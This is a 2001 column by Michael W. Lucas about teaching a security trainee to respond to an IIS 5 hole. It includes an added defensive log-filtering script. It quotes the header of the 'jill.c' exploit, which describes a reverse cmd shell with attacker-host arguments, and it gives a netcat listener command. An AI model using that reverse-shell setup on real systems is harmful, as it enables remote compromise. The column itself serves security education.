Proper Paranoia: Educating Your Co-Workers
by Michael W. Lucas
May 1, 2001, 3:15 p.m. The announcement of an IIS 5 system-level compromise hits BugTraq. We have a slew of vulnerable systems, but only one system that can be accessed beyond the firewall. Unfortunately, it's one everybody uses continuously.
Normally I would boot everyone off the system, and patch and reboot while letting user complaints slide off. Unfortunately, it's about time that our new Microsoft security trainee gets a chance to show his stuff. He's a rather experienced administrator, but new to the security aspect of this business.
There are days I really hate having a security trainee. You can prep them, train them, and coach them all you want. But someday, you have to step back and see if they hang themselves or, worse, hang your network.
I tail the firewall log to watch traffic to and from the server, pipe it through grep to get rid of anything inbound on port 80, and watch for outgoing connections to evil.hackers.org. Fortunately, nothing should be going out from this machine other than Web pages. I decide to give the new guy 30 minutes to notice the Microsoft announcement before I give up and announce that I'm either going to patch it myself or shut down external access to this host.
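The filtering described above, written out as an added example rather than the column's own commands: it strips ordinary inbound web hits from a firewall log so that anything else touching the server stands out, and separately counts outbound connections originating from the server, which a machine that only serves pages should never make. The log format, the server address 192.0.2.10 and the sample lines are all constructed for this example (loosely modelled on ipfw-style log lines) and are not from the original page.

```shell
#!/bin/sh
# Added example, not part of the original column. The log format is constructed:
#   "ipfw: <rule> <action> <proto> <src>:<sport> <dst>:<dport> <in|out> via <if>"

WEB_SERVER="${WEB_SERVER:-192.0.2.10}"   # assumed address of the exposed web server
# Escape the dots so the address is matched literally inside the regexes below.
WEB_RE=$(printf '%s' "$WEB_SERVER" | sed 's/\./\\./g')

# Keep every line that mentions the web server, except inbound connections to
# its port 80, which is the only traffic it is supposed to see.
filter_firewall_log() {
    grep -F "$WEB_SERVER" |
        grep -v -E " (TCP|UDP) [0-9.]+:[0-9]+ ${WEB_RE}:80 in "
}

# Count connections where the web server is the *source* and the direction is
# "out". A pure web server should produce zero; any hit deserves a look.
count_outbound_from_server() {
    grep -c -E " (TCP|UDP) ${WEB_RE}:[0-9]+ [0-9.]+:[0-9]+ out "
}

# Constructed sample log: normal inbound web hits, one denied probe of another
# port on the server, one hit on a different host, and one outbound connection
# from the server to an unrelated host, the kind of line that should never appear.
SAMPLE_LOG='ipfw: 100 Accept TCP 198.51.100.7:51234 192.0.2.10:80 in via fxp0
ipfw: 100 Accept TCP 198.51.100.8:51235 192.0.2.10:80 in via fxp0
ipfw: 200 Accept TCP 192.0.2.10:1055 203.0.113.9:4444 out via fxp0
ipfw: 300 Deny TCP 198.51.100.9:51236 192.0.2.10:445 in via fxp0
ipfw: 100 Accept TCP 198.51.100.7:51237 192.0.2.11:80 in via fxp0'

# Run the filters over the constructed sample so the result can be checked.
suspicious_lines() {
    printf '%s\n' "$SAMPLE_LOG" | filter_firewall_log
}

outbound_count() {
    printf '%s\n' "$SAMPLE_LOG" | count_outbound_from_server
}

# Usage against a live log would look like:
#   tail -f /var/log/security | filter_firewall_log
suspicious_lines
printf 'outbound connections from %s: %s\n' "$WEB_SERVER" "$(outbound_count)"
```

On the sample, only the outbound connection to port 4444 and the denied probe of port 445 survive the filter; the outbound count is 1. The second grep is the one that matters in practice: volume on port 80 hides everything else, and removing the expected traffic is what makes the unexpected line readable.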
3:25 p.m. I've revised the grep statement a dozen times, and am still going cross-eyed. It doesn't help that I have no real idea what sort of traffic I'm looking for, merely "anything weird." Fortunately the trainee walks up to me and says, "Uh, this looks bad ..."
I don't care how bad it looks, I get to stop watching packet streams for an attacker.
So we kick everyone off the server, basically shutting down the office while we apply the patch, verify that everything still works, and let everyone back on. Total work time lost: 30 minutes. Times 100 people, yes, but 30 minutes isn't that bad for an IT emergency. Users grumble about doing maintenance in the middle of the day, then subside.
I developed my security attitude the first time a system I was responsible for was hacked and my account was used to post a Usenet message taking credit for the hack. (I'd have to say that this particular hacker was entirely justified, but that's another story.) That sick feeling in the pit of my stomach remained for days. Because I have a large stomach, it was a pretty large sick feeling. That hack was the most effective attitude training possible. Books and FAQs about preventing and detecting intrusions are nice, but there's nothing like a good, hard boot to the gut to make it really sink in.
Unfortunately, management frowns on me kicking the junior guys.
May 4, 7 a.m. I toddle down to my desk, plug in, and download my mail. This morning's Special BugTraq Surprise is an exploit for the hole we just patched. I'm not going to reprint the whole thing here, just the head of the file.
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
* by: dark spyrit <firstname.lastname@example.org>
* respect to eeye for finding this one - nice work.
* shouts to halvar, neofight and the beavuh bitchez.
* this exploit overwrites an exception frame to control
* eip and get to our code.. the code then locates the
* pointer to our larger buffer and execs.
* usage: jill <victim host> <victim port> <attacker host> <attacker port>
* the shellcode spawns a reverse cmd shell.. so you need
* ro set up a netcat listener on the host you control.
* Ex: nc -l -p <attacker port> -vv
We learn when something is reinforced. So far, the trainee has learned that implementing security patches brings pain from griping users.
Knowing an exploit exists is one thing; seeing it in action is another. It's time for some reinforcement in the other direction.
The only thing I'm missing is netcat. That's simple enough to install on FreeBSD: cd /usr/ports/security/netcat && make install. It's finished well before the trainee comes in.